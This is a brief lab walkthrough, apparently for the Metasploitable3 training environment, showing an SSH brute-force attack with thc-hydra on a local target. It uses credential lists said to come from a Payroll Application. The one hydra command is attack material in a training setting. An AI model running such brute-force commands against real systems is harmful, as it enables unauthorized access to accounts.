# SSH Bruteforce with thc-hydra

1. After extracting credentials from the Payroll Application, use the credentials to run a bruteforce attack.

```
hydra -L user.txt -P pass.txt ssh://127.0.0.1:2222
```
![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/ssh-bruteforce/SSH_Bruteforce.png "Result 1")